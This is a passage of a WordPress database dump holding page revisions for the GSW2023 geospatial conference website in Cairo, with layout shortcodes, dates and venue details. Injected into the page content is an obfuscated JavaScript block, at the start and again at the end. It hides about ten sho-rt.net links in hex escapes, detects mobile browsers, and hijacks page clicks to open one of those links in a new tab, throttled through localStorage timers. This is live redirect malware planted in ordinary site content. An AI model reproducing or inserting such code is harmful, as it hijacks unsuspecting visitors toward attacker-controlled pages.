_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-11 22:13:29','2022-11-11 22:13:29','',3066,'https://gsw2023.com/?p=3314',0,'revision','',0),
(3315,1,'2022-11-11 22:15:34','2022-11-11 22:15:34','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 